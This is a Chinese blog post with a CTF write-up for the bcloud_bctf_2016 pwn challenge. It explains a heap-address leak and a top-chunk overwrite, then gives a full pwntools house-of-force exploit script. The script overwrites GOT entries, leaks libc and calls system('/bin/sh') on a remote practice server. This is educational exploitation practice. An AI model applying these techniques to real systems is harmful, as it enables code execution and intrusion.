bcloud_bctf_2016(house of force)

最新推荐文章于 2022-09-27 12:07:47 发布
最新推荐文章于 2022-09-27 12:07:47 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105588058
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

bcloud_bctf_2016

首先检查一下程序的保护机制

然后,我们用IDA分析一下,主逻辑里面没有什么问题

漏洞点在于最开始的地方,输入name的时候,由于malloc是在输入之后,因此,v2处s的0截断字符会被覆盖为堆指针,从而strcpy的时候把堆指针的值也复制进去,造成了堆地址泄露。

另一个漏洞在于这里,也是同样的问题,可以造成top chunk的size被修改为v3的值。

由于程序没有开启PIE。因此top chunk与程序段间的offset我们就能计算出来了。达到了house of force的条件,我们将top chunk移到堆指针数组处,然后分配一个堆,就能自由控制堆指针数组,实现任意地址读写。

#coding:utf8
from pwn import *
from LibcSearcher import *

#house of  force
#sh = process('./bcloud_bctf_2016')
sh = remote('node3.buuoj.cn',25777)
elf = ELF('./bcloud_bctf_2016')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
free_got = elf.got['free']
heap_array_addr = 0x0804B120
sh.sendafter('Input your name:','a'*0x40)
sh.recvuntil('a'*0x40)
heap_addr = u32(sh.recv(4))
print 'heap_addr=',hex(heap_addr)
sh.sendafter('Org:','a'*0x40)
#修改top chunk的size
sh.sendlineafter('Host:',p32(0xFFFFFFFF))
top_chunk_addr = heap_addr + 0xD0
print 'top_chunk_addr=',hex(top_chunk_addr)

def add(size,content):
   sh.sendlineafter('option--->>','1')
   sh.sendlineafter('Input the length of the note content:',str(size))
   sh.sendafter('Input the content:',content)

def edit(index,content):
   sh.sendlineafter('option--->>','3')
   sh.sendlineafter('Input the id:',str(index))
   sh.sendafter('Input the new content:',content)

def delete(index):
   sh.sendlineafter('option--->>','4')
   sh.sendlineafter('Input the id:',str(index))
offset = heap_array_addr - top_chunk_addr - 0x10
add(offset,'') #0
#现在top chunk移到了heap_array_addr-0x8处,我们可以控制heap_array了
add(0x18,'\n') #1

#修改heap_array
edit(1,p32(0) + p32(free_got) + p32(puts_got) + p32(0x0804B130) + '/bin/sh\x00')
#修改free的got表为puts的plt表
edit(1,p32(puts_plt) + '\n')
#泄露puts的地址
delete(2)
sh.recv(1)
puts_addr = u32(sh.recv(4))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改free的got表为system地址
edit(1,p32(system_addr) + '\n')
#getshell
delete(3)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2016 bctf exploit bcloud 400.rar
09-30
【标题】"2016 bctf exploit bcloud 400.rar" 提供的信息表明,这是一个关于2016年网络安全竞赛“蓝帽杯”(Bluehat Challenge)中的一个漏洞利用案例,目标是“bcloud”系统,难度级别为400。在信息安全领域,...
bcloud_bctf_2016【buuctf刷题】
最新发布
m0_73756460的博客
07-05 139
bcloud_bctf_2016【buu刷题】
2016 BCTF bcloud
yms0211的博客
09-27 335
house of force练习题 :2016 BCTF bcloud
bcloud_bctf_2016(32位堆,house-of-force
m0_51251108的博客
11-08 265
bcloud_bctf_2016: 参考师傅:https://blog.csdn.net/seaaseesa/article/details/105588058 https://www.cnblogs.com/LynneHuan/p/14616450.html#bcloud_bctf_2016 漏洞分析: 漏洞出现在strcpy那里 如果填满0x40个‘a’,strcpy最后添加的\x00会在v2处,v2是后赋值,指针覆盖了\x00 strcpy接收v2的值直到\x00或换行,但没有\x00,所以接着泄露了
bcloud_bctf_2016
z1r0的博客
02-26 421
bcloud_bctf_2016 查看保护 程序开头有两个漏洞第一个漏洞在这里,填满0x40个数据时可以将后面的堆的地址给输出出来。 接着这里将s给填满0x40,接着填入0xffffffff。就可以将top chunk的size改为-1也就是0xffffffff。 攻击思路:因为可以改top chunk的size。笔者这里使用house of force这个攻击手法。因为可以泄露堆地址,借助堆地址将地址申请到存放heap的地址那里(这个时候就可以改heap的地址),将heap的地址改成free的got
house-of-force-bctf2016_bcloud
csdn546229768的博客
01-28 1049
题目:bctf2016_bcloud 不得不说这题细节做的真好,如果不认真看还真找不到利用点 保护 分析 main函数: add函数: 因为在malloc是加上了4所以通过这里off-by-null行不通 dele、edit函数没有常见漏洞 重要函数 0x80487A1函数: 0x804868D函数: 注意看我注释上面的序号 当我输入长度为0x40时,经过read函数会在后面填充一个null字节,但是因为原本这块栈空间本来就经过了初始化全是null,所以并不会对数据造成影响,到了第二步malloc
BCTF_Writeups
03-14
百度杯BCTF线上赛前8名队伍的Writeup,大家可以学习一下,推荐看217写的。
BCTF-Writeups.rar
09-30
【标题】:“BCTF-Writeups.rar”是一个关于网络安全竞赛BCTF的解题报告集合,其中可能包含了参赛者们对于比赛中的各种技术挑战的分析、解决方案和心得。 【描述】:这个压缩包文件“BCTF-Writeups.rar”暗示了其...
2014BCTF re400.rar
09-30
2014BCTF re400.rar
玩转堆-堆漏洞的利用技巧.docx
01-10
习题包括 UAF、Double Free 等, DEFCON CTF Qualifier 2014: shitsco、BCTF 2016: router、HCTF2016 5-days 等。 六、结语 堆溢出是一种常见的漏洞,了解堆溢出的利用思想和防护策略是非常重要的。通过学习和实践...
2016 BCTF——bcloud
04-24 216
32位程序  #House Of Force 程序逻辑 1 void __cdecl main() 2 { 3 setvbuf(stdin, 0, 2, 0); 4 setvbuf(stdout, 0, 2, 0); 5 setvbuf(stderr, 0, 2, 0); 6 init_bcloud(); 7 while ( 1 ...
BCTF 2016 bcloud
Bill
04-09 1327
BCTF 2016 bcloud 漏洞简介 House of Force: 修改top chunk的size域,来达到我们任意地址读写的目的. 程序运行(主要功能) 1. welcome Input your name: Bill Hey Bill! Welcome to BCTF CLOUD NOTE MANAGE SYSTEM! Now let's set syn...
linux 堆溢出 pwn 指南,新手科普 | CTF PWN堆溢出总结
weixin_36467693的博客
05-16 923
学习汇总序言自从加入RTIS交流群, 在7o8v师傅,gd大佬的帮助下,PWN学习之路进入加速度。下面是八周学习的总结,基本上是按照how2heap路线走的。由于八周内容全写,篇幅太长,这里只讲述每道PWN题所用到的一个知识点。第一节(fastbin_dup_into_stack)知识点利用fastbin之间,单链表的连接的特性, 溢出修改下一个free chunk的地址, 造成任意地址写.例子:...
BUUCTF pwn wp 146 - 150
fa1c4的blog
04-30 558
hitcontraining_playfmt gwctf_2019_easy_pwn bctf2016_bcloud asis2016_b00ks warmup
2016BCTF-bcloud分析
小强的博客
08-16 1329
这是一道CTF题,涉及到The House of Force技术 文件及writeup可以在http://uaf.io/exploitation/2016/03/20/BCTF-bcloud.html 下载,另外还有http://www.freebuf.com/news/topnews/100143.html、https://github.com/ctfs/write-ups-2016/tr
House_of_Force-ctf-bcloud
weixin_30507269的博客
07-06 223
2016 bctf bcloud 下载: https://pan.baidu.com/s/1e-fvhaOJKzBQMxlrweLznw 提取码:ded5 放入ida中首先定位到 main()->init()->set_name() unsigned int set_name() { char name; // [esp+1Ch] [ebp-5Ch] <--注意这里,...
从wiki 重新打基础之 House Of Force
qq_41071646的博客
08-05 408
这次的暑假集训 感觉学到的东西还是比较可以的, 然后 大概是 16号左右是集训结束 本来的想法呢 是 看看mips 的 东西 但是发现 其实 那里的东西大部分还是栈溢出 然后感觉还是要老老实实的打基础 看看什么时候 (大概是 集训结束 ) 在看看那些东西 现在 先把基础打好,, 这个 House Of ForceCTF的时候遇到的 还真的不多 好像基本都没有怎么遇到过这类题目 这个...
BUUCTF-PWN刷题记录-9
weixin_44145820的博客
04-17 1490
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值